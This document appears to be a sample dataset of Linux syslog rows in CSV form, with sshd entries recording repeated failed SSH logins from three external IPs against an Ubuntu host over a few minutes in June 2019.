+10206,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:00:59,UbuntuDevEnv,2019-06-25 23:00:58,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,52881,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+10207,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:01:00,UbuntuDevEnv,2019-06-25 23:01:00,auth,UbuntuDevEnv,info,Failed password for invalid user suan from 152.250.252.179 port 59536 ssh2,52881,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,suan,152.250.252.1,59536,,
+10208,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:01:01,UbuntuDevEnv,2019-06-25 23:01:00,auth,UbuntuDevEnv,info,Received disconnect from 152.250.252.179 port 59536:11: Bye Bye [preauth],52881,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,152.250.252.1,59536,,
+10209,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:01:01,UbuntuDevEnv,2019-06-25 23:01:00,auth,UbuntuDevEnv,info,Disconnected from invalid user suan 152.250.252.179 port 59536 [preauth],52881,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,suan,152.250.252.1,59536,,
+10210,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:01:19,UbuntuDevEnv,2019-06-25 23:01:18,auth,UbuntuDevEnv,info,Invalid user ckodhek from 77.232.128.87 port 60907,52956,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ckodhek,77.232.128.8,60907,,
+10211,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:01:19,UbuntuDevEnv,2019-06-25 23:01:18,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,52956,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+10212,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:01:19,UbuntuDevEnv,2019-06-25 23:01:18,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=77.232.128.87,52956,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,77.232.128.8,,0,
+10213,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:01:21,UbuntuDevEnv,2019-06-25 23:01:20,auth,UbuntuDevEnv,info,Failed password for invalid user ckodhek from 77.232.128.87 port 60907 ssh2,52956,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ckodhek,77.232.128.8,60907,,
+10214,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:01:21,UbuntuDevEnv,2019-06-25 23:01:20,auth,UbuntuDevEnv,info,Disconnected from invalid user ckodhek 77.232.128.87 port 60907 [preauth],52956,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ckodhek,77.232.128.8,60907,,
+10215,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:01:21,UbuntuDevEnv,2019-06-25 23:01:20,auth,UbuntuDevEnv,info,Received disconnect from 77.232.128.87 port 60907:11: Bye Bye [preauth],52956,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,77.232.128.8,60907,,
+10216,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:01:40,UbuntuDevEnv,2019-06-25 23:01:40,auth,UbuntuDevEnv,info,Invalid user jenkins from 138.68.12.43 port 47696,53020,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,jenkins,138.68.12.4,47696,,
+10217,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:01:40,UbuntuDevEnv,2019-06-25 23:01:40,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,53020,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+10218,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:01:40,UbuntuDevEnv,2019-06-25 23:01:40,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=138.68.12.43,53020,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,138.68.12.4,,0,
+10219,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:01:42,UbuntuDevEnv,2019-06-25 23:01:41,auth,UbuntuDevEnv,info,Failed password for invalid user jenkins from 138.68.12.43 port 47696 ssh2,53020,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,jenkins,138.68.12.4,47696,,
+10220,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:01:42,UbuntuDevEnv,2019-06-25 23:01:41,auth,UbuntuDevEnv,info,Received disconnect from 138.68.12.43 port 47696:11: Bye Bye [preauth],53020,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,138.68.12.4,47696,,
+10221,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:01:42,UbuntuDevEnv,2019-06-25 23:01:41,auth,UbuntuDevEnv,info,Disconnected from invalid user jenkins 138.68.12.43 port 47696 [preauth],53020,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,jenkins,138.68.12.4,47696,,
+10222,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:02:47,UbuntuDevEnv,2019-06-25 23:02:46,auth,UbuntuDevEnv,info,Invalid user emil from 152.250.252.179 port 47968,53268,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,emil,152.250.252.1,47968,,
+10223,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:02:47,UbuntuDevEnv,2019-06-25 23:02:46,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=152.250.252.179,53268,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,152.250.252.1,,0,
+10224,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:02:47,UbuntuDevEnv,2019-06-25 23:02:46,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,53268,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+10225,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:02:48,UbuntuDevEnv,2019-06-25 23:02:48,auth,UbuntuDevEnv,info,Failed password for invalid user emil from 152.250.252.179 port 47968 ssh2,53268,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,emil,152.250.252.1,47968,,
+10226,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:02:48,UbuntuDevEnv,2019-06-25 23:02:48,auth,UbuntuDevEnv,info,Received disconnect from 152.250.252.179 port 47968:11: Bye Bye [preauth],53268,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,152.250.252.1,47968,,
+10227,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:02:48,UbuntuDevEnv,2019-06-25 23:02:48,auth,UbuntuDevEnv,info,Disconnected from invalid user emil 152.250.252.179 port 47968 [preauth],53268,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,emil,152.250.252.1,47968,,
+10228,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:02:49,UbuntuDevEnv,2019-06-25 23:02:48,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=77.232.128.87  user=www-data,53280,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,www,77.232.128.8,,0,
+10229,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:02:50,UbuntuDevEnv,2019-06-25 23:02:50,auth,UbuntuDevEnv,info,Failed password for www-data from 77.232.128.87 port 41200 ssh2,53280,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,77.232.128.8,41200,,
+10230,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:02:50,UbuntuDevEnv,2019-06-25 23:02:50,auth,UbuntuDevEnv,info,Disconnected from authenticating user www-data 77.232.128.87 port 41200 [preauth],53280,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,www,77.232.128.8,41200,,
+10231,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:02:50,UbuntuDevEnv,2019-06-25 23:02:50,auth,UbuntuDevEnv,info,Received disconnect from 77.232.128.87 port 41200:11: Bye Bye [preauth],53280,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,77.232.128.8,41200,,
+10232,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:03:56,UbuntuDevEnv,2019-06-25 23:03:55,auth,UbuntuDevEnv,info,Invalid user testuser from 138.68.12.43 port 35668,53511,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,testuser,138.68.12.4,35668,,
+10233,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:03:56,UbuntuDevEnv,2019-06-25 23:03:55,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,53511,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+10234,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:03:56,UbuntuDevEnv,2019-06-25 23:03:55,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=138.68.12.43,53511,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,138.68.12.4,,0,
+10235,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:03:58,UbuntuDevEnv,2019-06-25 23:03:57,auth,UbuntuDevEnv,info,Failed password for invalid user testuser from 138.68.12.43 port 35668 ssh2,53511,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,testuser,138.68.12.4,35668,,
+10236,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:03:58,UbuntuDevEnv,2019-06-25 23:03:57,auth,UbuntuDevEnv,info,Disconnected from invalid user testuser 138.68.12.43 port 35668 [preauth],53511,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,testuser,138.68.12.4,35668,,
+10237,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:03:58,UbuntuDevEnv,2019-06-25 23:03:57,auth,UbuntuDevEnv,info,Received disconnect from 138.68.12.43 port 35668:11: Bye Bye [preauth],53511,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,138.68.12.4,35668,,
+10238,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:04:19,UbuntuDevEnv,2019-06-25 23:04:19,auth,UbuntuDevEnv,info,Invalid user finn from 77.232.128.87 port 49728,53599,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,finn,77.232.128.8,49728,,
+10239,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:04:19,UbuntuDevEnv,2019-06-25 23:04:19,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=77.232.128.87,53599,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,77.232.128.8,,0,
+10240,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:04:19,UbuntuDevEnv,2019-06-25 23:04:19,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,53599,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+10241,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:04:21,UbuntuDevEnv,2019-06-25 23:04:21,auth,UbuntuDevEnv,info,Failed password for invalid user finn from 77.232.128.87 port 49728 ssh2,53599,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,finn,77.232.128.8,49728,,
+10242,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:04:21,UbuntuDevEnv,2019-06-25 23:04:21,auth,UbuntuDevEnv,info,Disconnected from invalid user finn 77.232.128.87 port 49728 [preauth],53599,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,finn,77.232.128.8,49728,,
+10243,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:04:21,UbuntuDevEnv,2019-06-25 23:04:21,auth,UbuntuDevEnv,info,Received disconnect from 77.232.128.87 port 49728:11: Bye Bye [preauth],53599,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,77.232.128.8,49728,,
+10244,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:04:41,UbuntuDevEnv,2019-06-25 23:04:41,auth,UbuntuDevEnv,info,Invalid user martina from 152.250.252.179 port 36404,53678,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,martina,152.250.252.1,36404,,
+10245,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:04:41,UbuntuDevEnv,2019-06-25 23:04:41,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=152.250.252.179,53678,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,152.250.252.1,,0,
+10246,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:04:41,UbuntuDevEnv,2019-06-25 23:04:41,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,53678,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+10247,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:04:43,UbuntuDevEnv,2019-06-25 23:04:42,auth,UbuntuDevEnv,info,Failed password for invalid user martina from 152.250.252.179 port 36404 ssh2,53678,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,martina,152.250.252.1,36404,,
+10248,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:04:43,UbuntuDevEnv,2019-06-25 23:04:42,auth,UbuntuDevEnv,info,Received disconnect from 152.250.252.179 port 36404:11: Bye Bye [preauth],53678,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,152.250.252.1,36404,,
+10249,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:04:43,UbuntuDevEnv,2019-06-25 23:04:42,auth,UbuntuDevEnv,info,Disconnected from invalid user martina 152.250.252.179 port 36404 [preauth],53678,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,martina,152.250.252.1,36404,,
+10250,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:05:52,UbuntuDevEnv,2019-06-25 23:05:52,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=77.232.128.87  user=root,53925,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,77.232.128.8,,0,
+10251,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:05:54,UbuntuDevEnv,2019-06-25 23:05:53,auth,UbuntuDevEnv,info,Failed password for root from 77.232.128.87 port 58256 ssh2,53925,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,77.232.128.8,58256,,
+10252,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:05:54,UbuntuDevEnv,2019-06-25 23:05:53,auth,UbuntuDevEnv,info,Received disconnect from 77.232.128.87 port 58256:11: Bye Bye [preauth],53925,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,77.232.128.8,58256,,
+10253,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:05:54,UbuntuDevEnv,2019-06-25 23:05:53,auth,UbuntuDevEnv,info,Disconnected from authenticating user root 77.232.128.87 port 58256 [preauth],53925,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,root,77.232.128.8,58256,,
+10254,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:06:10,UbuntuDevEnv,2019-06-25 23:06:09,auth,UbuntuDevEnv,info,Invalid user apc from 138.68.12.43 port 51880,53980,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,apc,138.68.12.4,51880,,
+10255,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:06:10,UbuntuDevEnv,2019-06-25 23:06:09,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=138.68.12.43,53980,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,138.68.12.4,,0,
+10256,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:06:10,UbuntuDevEnv,2019-06-25 23:06:09,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,53980,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+10257,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:06:12,UbuntuDevEnv,2019-06-25 23:06:12,auth,UbuntuDevEnv,info,Failed password for invalid user apc from 138.68.12.43 port 51880 ssh2,53980,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,apc,138.68.12.4,51880,,
+10258,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:06:12,UbuntuDevEnv,2019-06-25 23:06:12,auth,UbuntuDevEnv,info,Received disconnect from 138.68.12.43 port 51880:11: Bye Bye [preauth],53980,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,138.68.12.4,51880,,
+10259,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:06:12,UbuntuDevEnv,2019-06-25 23:06:12,auth,UbuntuDevEnv,info,Disconnected from invalid user apc 138.68.12.43 port 51880 [preauth],53980,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,apc,138.68.12.4,51880,,
+10260,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:06:37,UbuntuDevEnv,2019-06-25 23:06:36,auth,UbuntuDevEnv,info,Invalid user seeb from 152.250.252.179 port 53076,54087,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,seeb,152.250.252.1,53076,,
+10261,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:06:37,UbuntuDevEnv,2019-06-25 23:06:36,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,54087,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+10262,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:06:37,UbuntuDevEnv,2019-06-25 23:06:36,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=152.250.252.179,54087,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,152.250.252.1,,0,
+10263,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:06:38,UbuntuDevEnv,2019-06-25 23:06:38,auth,UbuntuDevEnv,info,Failed password for invalid user seeb from 152.250.252.179 port 53076 ssh2,54087,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,seeb,152.250.252.1,53076,,
+10264,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:06:39,UbuntuDevEnv,2019-06-25 23:06:38,auth,UbuntuDevEnv,info,Received disconnect from 152.250.252.179 port 53076:11: Bye Bye [preauth],54087,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,152.250.252.1,53076,,
+10265,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 23:06:39,UbuntuDevEnv,2019-06-25 23:06:38,auth,UbuntuDevEnv,info,Disconnected from invalid user seeb 152.250.252.179 port 53076 [preauth],54087,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,seeb,152.250.252.1,53076,,
